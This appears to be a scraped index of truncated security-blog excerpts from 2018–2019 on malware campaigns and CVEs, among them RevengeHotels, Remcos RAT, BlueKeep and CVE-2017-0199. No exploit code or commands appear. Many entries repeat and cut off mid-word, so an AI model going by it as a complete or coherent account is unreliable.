The main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts and
Securelist
RevengeHotels: cybercrime targeting hotel front desks worldwide
blogs_securelist·2019-11-28·CVSS 7.8
[HIGH] RevengeHotels: cybercrime targeting hotel front desks worldwide
Authors
- GReAT
RevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.
The main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts a
Zscaler
Fileless malware campaign roundup | Blog
blogs_zscaler·2019-10-31
Fileless malware campaign roundup | Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Cyber Threats
# Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi
2019/08/15
Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a service
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Cyberbedrohungen
## Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi Aug 15, 2019 Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a ser
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Cyber Threats
# Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi
Aug 15, 2019
Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a servic
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Ciberamenazas
## Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi Aug 15, 2019 Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a servic
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Cyber Threats
## Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi Aug 15, 2019 Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a servic
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Cyber Threats
## Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi 2019/08/15 Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a service
Trendmicro
Analysis: New Remcos RAT Arrives Via Phishing Email
blogs_trendmicro·2019-08-15·CVSS 7.8
[HIGH] Analysis: New Remcos RAT Arrives Via Phishing Email
Minacce cyber
## Analysis: New Remcos RAT Arrives Via Phishing Email
We found another adware family that not only displays advertisements that are difficult to close, it employs unique techniques to evade detection through user behavior and time-based triggers.
By: Aliakbar Zahravi Aug 15, 2019 Read time: ( words)
Save to Folio
In July, we came across a phishing email purporting to be a new order notification, which contains a malicious attachment that leads to the remote access tool Remcos RAT (detected by Trend Micro as BKDR_SOCMER.SM). This attack delivers Remcos using an AutoIt wrapper that incorporates various obfuscation and anti-debugging techniques to evade detection, which is a common method for distributing known malware.
Remcos RAT emerged in 2016 being peddled as a servic
Fortinet
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
blogs_fortinet·2019-05-23·CVSS 9.8
CVE-2019-0708 [CRITICAL] CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
FORTIGUARD LABS THREAT RESEARCH
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
By FortiGuard SE Team | May 23, 2019
On May 14th, 2019, Microsoft released their usual set of updates, referred to within the industry as “Patch Tuesday.” At first glance, the inclusion of CVE-2019-0708 appeared to be similar to all the other updates released on that day—it included a writeup containing an overview of the update, including the Impact (Remote Code Execution), Severity (Critical), and Platforms (multiple) affected.
However, what piqued the curiosity of the security community was that the platforms listed as affected by this vulnerability were products considered to be no longer supported by Microsoft:
Windows XP SP3 x86, Windows XP Professional x64 Edition SP2, Win
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Securelist
GreyEnergy’s overlap with Zebrocy
blogs_securelist·2019-01-24·CVSS 7.8
[HIGH] GreyEnergy’s overlap with Zebrocy
Table of Contents
- Details
- Conclusions
Authors
- Kaspersky ICS CERT
In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.
Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s target
Securelist
GreyEnergy’s overlap with Zebrocy
blogs_securelist·2019-01-24·CVSS 7.8
[HIGH] GreyEnergy’s overlap with Zebrocy
Table of Contents
Details
Servers
Attacked company
Attack timeframe
Conclusions
Authors
Kaspersky ICS CERT
In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.
Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy” . The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of
Fortinet
A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
blogs_fortinet·2018-12-16·CVSS 7.8
CVE-2018-8587 [HIGH] A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
FORTIGUARD LABS THREAT RESEARCH
A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
By Yonghui Han | December 16, 2018
FortiGuard Labs Threat Analysis Report
Earlier this year, Fortinet's FortiGuard Labs researcher Yonghui Han reported a Heap Corruption vulnerability in Office Outlook to Microsoft by following Fortinet’s responsible disclosure process. On Patch Tuesday of December 2018, Microsoft announced that they had fixed this vulnerability, released a corresponding advisory, and assigned it the vulnerability identifier CVE-2018-8587.
Microsoft Outlook is one of the components of the Microsoft Office suite that is widely used to send and receive emails, manage contacts, record and track schedules, and perform other tasks. The Heap Corruption vulnerability was fou
Fortinet
Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
blogs_fortinet·2018-12-04·CVSS 8.1
CVE-2018-16525 [HIGH] Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
FORTIGUARD LABS THREAT RESEARCH
Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
By Amir Zali | December 04, 2018
Recently, I saw a report about several bugs that were found on FreeRTOS. Curiosity got the best of me, and I started to take a look to see what can be done from the IPS side to protect our customers because of importance of IoT devices and the popularity of this operating system. (Since the initial report more details have been made available here, CVE-2018-16525.)
In this post I will just elaborate on a single RCE bug that I have managed to exploit in the UDP protocol which is implemented in FreeRTOS+TCP.
RTOS, Real Time Operating System, is a type of operating system that provides deterministic execution. AWS FreeRTOS is a class of RTOS from Amazon Web Se
Fortinet
Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
blogs_fortinet·2018-11-13·CVSS 7.8
[HIGH] Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
FORTIGUARD LABS THREAT RESEARCH
Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
By Yonghui Han | November 13, 2018
FortiGuard Labs Breaking Threat Research
This Patch Tuesday, November 13, 2018, Microsoft patched six vulnerabilities discovered in Microsoft Outlook. Four of them were discovered and reported on by Fortinet researcher Yonghui Han by following Fortinet’s responsible disclosure process. The CVE numbers assigned to them are CVE-2018-8522, CVE-2018-8524, CVE-2018-8576 and CVE-2018-8582. All Microsoft Outlook versions from 2010 to 2019 are affected. All of four of these vulnerabilities could lead to remote code execution and have been given an Important rating by Microsoft. In this post we will provide more details on these
Unit42
New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
blogs_unit42·2018-10-25·CVSS 7.8
[HIGH] New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
Threat Research Center
Threat Research
Malware
## New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
Unit 42
Published: October 25, 2018
Cybercrime
Malware
Threat Research
Cobalt Gang
Nowadays, it’s very easy for an advanced attacker to use commodity tools and malware along with very simple initial delivery methods to keep a low profile and stay away from possible attribution. One of the most common approaches is the use of spear phishing emails employing social engineering or commonly used exploits (such as CVE-2017-0199 or the ThreadKit builder ) to trick the employees of organizations of interest. Once the initial infection has occurred is when the attacker becomes more sophisticated, deploying advanced custom pieces of malware
Unit42
New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
blogs_unit42·2018-10-25·CVSS 7.8
CVE-2017-0199 [HIGH] New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
Nowadays, it’s very easy for an advanced attacker to use commodity tools and malware along with very simple initial delivery methods to keep a low profile and stay away from possible attribution. One of the most common approaches is the use of spear phishing emails employing social engineering or commonly used exploits (such as CVE-2017-0199 or the ThreadKit builder) to trick the employees of organizations of interest. Once the initial infection has occurred is when the attacker becomes more sophisticated, deploying advanced custom pieces of malware, more advanced tools, and/or using living-off-the land tools (such as the use of PowerShell, or tools like CMSTP or Regsvr32).
This approach makes it more difficult for threat hunters and defenders to find those needles in the haystack necessa
Fortinet
An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
blogs_fortinet·2018-10-19·CVSS 7.5
CVE-2018-8467 [HIGH] An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
FORTIGUARD LABS THREAT RESEARCH
An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
By Dehui Yin | October 19, 2018
The Javascript Type Confusion bug is a critical vulnerability that exists in many popular browsers. It causes memory corruption and can possibly be exploited to execute arbitrary code when a vulnerable system browses a malicious web page. A growing number of these type of confusion bugs in the Microsoft Chakra Engine have been disclosed and fixed by over the past recent months.
CVE-2018-8467 is one of the classic ‘Type Confusion’ bugs in the Microsoft Edge Chakra Engine that was fixed by Microsoft several weeks ago. In this post, the team at FortiGuard Labs looks deeply into the Microsoft Edge Chakra Engine assembly codes
Talos
Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
blogs_talos·2018-10-15·CVSS 7.8
[HIGH] Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
## Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
This blog post was authored by Edmund Brumaghin and Holger Unterbrink with contributions from Emmanuel Tacheau .
## Executive Summary
Cisco Talos has discovered a new malware campaign that drops the sophisticated information-stealing trojan called "Agent Tesla," and other malware such as the Loki information stealer. Initially, Talos' telemetry systems detected a highly suspicious document that wasn't picked up by common antivirus solutions. However, Threat Grid , Cisco's unified malware analysis and threat intelligence platform, identified the unknown file as malware. The adversaries behind this malware use a well-known exploit chain, but modified it in such a way so that antivirus sol
Talos
Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
blogs_talos·2018-10-15·CVSS 7.8
[HIGH] Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
This blog post was authored by Edmund Brumaghin and Holger Unterbrink with contributions from Emmanuel Tacheau.
### Executive Summary
Cisco Talos has discovered a new malware campaign that drops the sophisticated information-stealing trojan called "Agent Tesla," and other malware such as the Loki information stealer. Initially, Talos' telemetry systems detected a highly suspicious document that wasn't picked up by common antivirus solutions. However, Threat Grid, Cisco's unified malware analysis and threat intelligence platform, identified the unknown file as malware. The adversaries behind this malware use a well-known exploit chain, but modified it in such a way so that antivirus solutions don't detect it. In this post, we will outline the steps the adversaries took to remain undetecte
Fortinet
Microsoft JET Database Engine Code Execution Vulnerability
blogs_fortinet·2018-09-14·CVSS 7.8
CVE-2018-8392 [HIGH] Microsoft JET Database Engine Code Execution Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Microsoft JET Database Engine Code Execution Vulnerability
By Honggang Ren | September 14, 2018
This June, FortiGuard Labs researcher Honggang Ren discovered a code execution vulnerability in the Windows JET Database Engine and reported it to Microsoft using the responsible disclosure process. On the patch Tuesday of September 2018, Microsoft released a Security Advisory that contains the fix for this vulnerability, identifying it as CVE-2018-8392.
The Microsoft JET Database Engine is a database engine on which several Microsoft products have been built. A database engine is the underlying component of a database, a collection of information stored on a computer in a systematic way.
The vulnerable DLL msexcl40.dll identified by FortiGuard Labs is a comp
Fortinet
Russian Army Exhibition Decoy Leads to New BISKVIT Malware
blogs_fortinet·2018-08-20·CVSS 7.8
CVE-2017-0199 [HIGH] Russian Army Exhibition Decoy Leads to New BISKVIT Malware
FORTIGUARD LABS THREAT RESEARCH
Russian Army Exhibition Decoy Leads to New BISKVIT Malware
By Jasper Manuel and Rommel Joven | August 20, 2018
Afew days ago, the FortiGuard Labs team found a malicious PPSX file exploiting CVE-2017-0199 that had been crafted for Russian speakers. The filename “Выставка” when translated means “Exhibition”. On further examination, the PPSX file seems to have been targeted at an exhibition being held annually in Russia called Army 2018 International Military and Technical Forum. This is one of the largest exhibitions of military weapons and special equipment, not only in Russia, but also one of the outstanding events among similar exhibitions in the world. The discovery of this malicious document is very timely since the event is scheduled to be held August
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Attacks on IoT devices
- Online threats in the financial sector
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q2 figures
According to KSN:
- Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
- 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
- Ransomware attacks were registered on the computers of 158,921 unique users.
- Our File Anti-Virus logged 192,053,
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
Q2 figures
Mobile threats
General statistics
Distribution of detected mobile apps by type
TOP 20 mobile malware
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Attacks on IoT devices
Telnet attacks
TOP 10 countries by shares of IoT devices infected via Telnet
TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks
SSH attacks
TOP 10 countries by shares of IoT devices attacked via SSH
Online threats in the financial sector
Q2 events
New banking Trojan DanaBot
The peculiar BackSwap technique
Carbanak gang leader detained
Ransomware Trojan uses Doppelgänging technique
General statistics on financial threats
Geography of attacks
TOP 10 countries by percentage of attacked users
TOP 10 banking malware f
Unit42
The Gorgon Group: Slithering Between Nation State and Cybercrime
blogs_unit42·2018-08-02
The Gorgon Group: Slithering Between Nation State and Cybercrime
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.
In addition to the numerous targeted attacks, Unit 42 discovered that the group also performed a litany of attacks and operations around the globe, involving both cri
Unit42
The Gorgon Group: Slithering Between Nation State and Cybercrime
blogs_unit42·2018-08-02·CVSS 7.8
CVE-2017-0199 [HIGH] The Gorgon Group: Slithering Between Nation State and Cybercrime
Threat Research Center
Threat Actor Groups
Vulnerabilities
## The Gorgon Group: Slithering Between Nation State and Cybercrime
Robert Falcone
David Fuertes
Josh Grunzweig
Kyle Wilhoit
Published: August 2, 2018
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
CVE-2017-0199
Gorgon Group
Subaat
Unit 42 researchers have been tracking Subaat , an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tu
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we’ve already posted about before, and some are new.
Macros
Macros are the most straight-forward way for an attacker to weaponize Office documents. Office applicatio
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
## Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Liat Hayun
Published: July 24, 2018
High Profile Threats
Malware
Embedded Flash files
HTA Handlers
Macros
Microsoft Office Documents
OLE Objects
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents
Talos
My Little FormBook
blogs_talos·2018-06-20·CVSS 7.8
[HIGH] My Little FormBook
This blog post is authored by Warren Mercer and Paul Rascagneres.
## SummaryCisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.
The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office documen
Talos
My Little FormBook
blogs_talos·2018-06-20·CVSS 7.8
[HIGH] My Little FormBook
## My Little FormBook
This blog post is authored by Warren Mercer and Paul Rascagneres .
## Summary Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.
The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and
Fortinet
Non-Russian Matryoshka: Russian Service Centers Under Attack
blogs_fortinet·2018-06-07
Non-Russian Matryoshka: Russian Service Centers Under Attack
FORTIGUARD LABS THREAT RESEARCH
Non-Russian Matryoshka: Russian Service Centers Under Attack
By Artem Semenchenko, Evgeny Ananin, and Yueh Ting Chen | June 07, 2018
With the help of FortiGuard’s in-house Threat Intelligence Platform (Kadena), FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.
A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.
In this article we will overview every stage of these attacks. In addition, we will try to find any
Fortinet
Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
blogs_fortinet·2018-05-23·CVSS 9.8
CVE-2017-7269 [CRITICAL] Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
FORTIGUARD LABS THREAT RESEARCH
Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
By Bing Liu | May 23, 2018
There is a buffer overflow vulnerability in the WebDAV service in Microsoft IIS 6.0 identified as CVE-2017-7269 that allows remote attackers to execute arbitrary code via a long HTTP header. This vulnerability was reportedly first exploited in July or August of 2016, and the PoC was publicly disclosed in March 2017 on GitHub. Over the past month, however, FortiGuard Labs has been documenting a spike in new attacks targeting this vulnerability, peaking on Apr 13, 2018 when we logged over 4 million triggers.
Fortinet released an IPS signature for this vulnerability in March of 2017 named MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow. The daily trigger rate of
Fortinet
An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
blogs_fortinet·2018-05-18·CVSS 7.5
CVE-2018-0838 [HIGH] An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
FORTIGUARD LABS THREAT RESEARCH
An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
By Dehui Yin | May 18, 2018
CVE-2018-0838 is one of the ‘type confusion’ bugs in the Microsoft Edge Chakra Engine that was fixed by Microsoft three months ago. This bug causes memory corruption and can possibly be exploited to execute arbitrary code when a vulnerable system browses a malicious web page via Microsoft Edge.
This type confusion bug occurs when the codes generated by the Chakra just-in-time (JIT) java compiler change the property value of a newly converted JavascriptArray object without validation. In this post, the team at FortiGuard Labs looks deeply into the Microsoft Edge Chakra Engine assembly codes to expose the root cause of this vulnerability.
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
Q1 figures
Mobile threats
Q1 events
Mobile threat statistics
Distribution of detected mobile apps by type
TOP 20 mobile malware
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Vulnerable apps used by cybercriminals
Malicious programs online (attacks via web resources)
Online threats in the financial sector
Q1 events
Financial threat statistics
Geography of attacks
TOP 10 banking malware families
Cryptoware programs
Q1 events
Number of new modifications
Number of users attacked by Trojan cryptors
Geography of attacks
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Alexander Li
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
Vladislav Stolyarov
Boris Larin
Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
## Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After the
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
